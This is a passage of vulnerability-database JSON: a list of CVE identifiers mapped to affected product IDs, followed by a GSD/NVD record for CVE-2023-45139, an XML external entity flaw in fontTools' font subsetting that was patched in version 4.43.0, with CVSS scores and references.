      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-42916"
    },
    {
      "cve": "CVE-2022-43551",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-43551"
    },
    {
      "cve": "CVE-2022-43552",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-43552"
    },
    {
      "cve": "CVE-2022-4603",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-4603"
    },
    {
      "cve": "CVE-2022-48064",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-48064"
    },
    {
      "cve": "CVE-2022-48624",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-48624"
    },
    {
      "cve": "CVE-2023-0461",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-0461"
    },
    {
      "cve": "CVE-2023-1667",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-1667"
    },
    {
      "cve": "CVE-2023-1916",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-1916"
    },
    {
      "cve": "CVE-2023-20592",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-20592"
    },
    {
      "cve": "CVE-2023-2137",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-2137"
    },
    {
      "cve": "CVE-2023-22745",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-22745"
    },
    {
      "cve": "CVE-2023-2283",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-2283"
    },
    {
      "cve": "CVE-2023-23914",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-23914"
    },
    {
      "cve": "CVE-2023-23915",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-23915"
    },
    {
      "cve": "CVE-2023-23916",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-23916"
    },
    {
      "cve": "CVE-2023-23934",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-23934"
    },
    {
      "cve": "CVE-2023-25577",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-25577"
    },
    {
      "cve": "CVE-2023-26965",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-26965"
    },
    {
      "cve": "CVE-2023-27043",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27043"
    },
    {
      "cve": "CVE-2023-2731",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-2731"
    },
    {
      "cve": "CVE-2023-27533",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27533"
    },
    {
      "cve": "CVE-2023-27534",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27534"
    },
    {
      "cve": "CVE-2023-27535",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27535"
    },
    {
      "cve": "CVE-2023-27536",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27536"
    },
    {
      "cve": "CVE-2023-27538",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27538"
    },
    {
      "cve": "CVE-2023-28319",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-28319"
    },
    {
      "cve": "CVE-2023-28320",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-28320"
    },
    {
      "cve": "CVE-2023-28321",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-28321"
    },
    {
      "cve": "CVE-2023-28322",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-28322"
    },
    {
      "cve": "CVE-2023-31083",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-31083"
    },
    {
      "cve": "CVE-2023-34055",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-34055"
    },
    {
      "cve": "CVE-2023-35116",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-35116"
    },
    {
      "cve": "CVE-2023-38286",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38286"
    },
    {
      "cve": "CVE-2023-38469",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38469"
    },
    {
      "cve": "CVE-2023-38471",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38471"
    },
    {
      "cve": "CVE-2023-38472",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38472"
    },
    {
      "cve": "CVE-2023-38545",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38545"
    },
    {
      "cve": "CVE-2023-38546",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38546"
    },
    {
      "cve": "CVE-2023-39197",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-39197"
    },
    {
      "cve": "CVE-2023-39198",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-39198"
    },
    {
      "cve": "CVE-2023-39804",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-39804"
    },
    {
      "cve": "CVE-2023-40217",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-40217"
    },
    {
      "cve": "CVE-2023-42465",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-42465"
    },
    {
      "cve": "CVE-2023-4255",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-4255"
    },
    {
      "cve": "CVE-2023-45139",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-45139"
    },
    {
      "cve": "CVE-2023-45322",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-45322"
    },
    {
      "cve": "CVE-2023-45863",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-45863"
    },
    {
      "cve": "CVE-2023-45871",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-45871"
    },
    {
      "cve": "CVE-2023-46136",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-46136"
    },
    {
      "cve": "CVE-2023-46218",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-46218"
    },
    {
      "cve": "CVE-2023-46219",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-46219"
    },
    {
      "cve": "CVE-2023-46751",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-46751"
    },
    {
      "cve": "CVE-2023-48795",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-48795"
    },
    {
      "cve": "CVE-2023-49083",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-49083"
    },
    {
      "cve": "CVE-2023-50447",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-50447"
    },
    {
      "cve": "CVE-2023-5049",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-5049"
    },
    {
      "cve": "CVE-2023-50495",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-50495"
    },
    {
      "cve": "CVE-2023-50782",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-50782"
    },
    {
      "cve": "CVE-2023-51257",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-51257"
    },
    {
      "cve": "CVE-2023-52425",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-52425"
    },
    {
      "cve": "CVE-2023-52426",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-52426"
    },
    {
      "cve": "CVE-2023-5678",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-5678"
    },
    {
      "cve": "CVE-2023-5717",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-5717"
    },
    {
      "cve": "CVE-2023-5752",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-5752"
    },
    {
      "cve": "CVE-2023-6004",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-6004"
    },
    {
      "cve": "CVE-2023-6597",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-6597"
    },
    {
      "cve": "CVE-2023-6918",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-6918"
    },
    {
      "cve": "CVE-2023-7207",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-7207"
    },
    {
      "cve": "CVE-2024-0450",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-0450"
    },
    {
      "cve": "CVE-2024-0727",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-0727"
    },
    {
      "cve": "CVE-2024-0985",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-0985"
    },
    {
      "cve": "CVE-2024-21626",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-21626"
    },
    {
      "cve": "CVE-2024-22195",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-22195"
    },
    {
      "cve": "CVE-2024-22365",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-22365"
    },
    {
      "cve": "CVE-2024-23651",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-23651"
    },
    {
      "cve": "CVE-2024-23652",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-23652"
    },
    {
      "cve": "CVE-2024-23653",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-23653"
    },
    {
      "cve": "CVE-2024-23672",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-23672"
    },
    {
      "cve": "CVE-2024-24549",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-24549"
    },
    {
      "cve": "CVE-2024-25062",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-25062"
    },
    {
      "cve": "CVE-2024-26130",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-26130"
    },
    {
      "cve": "CVE-2024-26458",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-26458"
    },
    {
      "cve": "CVE-2024-26461",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-26461"
    },
    {
      "cve": "CVE-2024-28085",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-28085"
    },
    {
      "cve": "CVE-2024-28182",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-28182"
    },
    {
      "cve": "CVE-2024-28219",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-28219"
    },
    {
      "cve": "CVE-2024-28757",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-28757"
    }
  ]
}
  gsd-2023-45139
Vulnerability from gsd
{
  "GSD": {
    "alias": "CVE-2023-45139",
    "id": "GSD-2023-45139"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-45139"
      ],
      "details": "fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0.",
      "id": "GSD-2023-45139",
      "modified": "2023-12-13T01:20:38.165900Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-45139",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "fonttools",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003e= 4.28.2, \u003c 4.43.0"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "fonttools"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-611",
                "lang": "eng",
                "value": "CWE-611: Improper Restriction of XML External Entity Reference"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5",
            "refsource": "MISC",
            "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
          },
          {
            "name": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c",
            "refsource": "MISC",
            "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
          },
          {
            "name": "https://github.com/fonttools/fonttools/releases/tag/4.43.0",
            "refsource": "MISC",
            "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
          },
          {
            "name": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/",
            "refsource": "MISC",
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-6673-4983-2vx5",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "configurations": [
          {
            "nodes": [
              {
                "cpeMatch": [
                  {
                    "criteria": "cpe:2.3:a:fonttools:fonttools:*:*:*:*:*:python:*:*",
                    "matchCriteriaId": "CA51147F-FB56-471F-AA46-967C55F0AE97",
                    "versionEndExcluding": "4.43.0",
                    "versionStartIncluding": "4.28.2",
                    "vulnerable": true
                  }
                ],
                "negate": false,
                "operator": "OR"
              }
            ]
          }
        ],
        "descriptions": [
          {
            "lang": "en",
            "value": "fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0."
          },
          {
            "lang": "es",
            "value": "fontTools es una librer\u00eda para manipular fuentes, escrita en Python. El m\u00f3dulo subsetting tiene una vulnerabilidad de inyecci\u00f3n de entidades externas XML (XXE) que permite a un atacante resolver entidades arbitrarias cuando se analiza una fuente candidata (fuentes OT-SVG), que contiene una tabla SVG. Esto permite a los atacantes incluir archivos arbitrarios del sistema de archivos en el que se ejecuta fontTools o realizar solicitudes web desde el sistema host. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 4.43.0."
          }
        ],
        "id": "CVE-2023-45139",
        "lastModified": "2024-01-25T02:15:52.937",
        "metrics": {
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "nvd@nist.gov",
              "type": "Primary"
            },
            {
              "cvssData": {
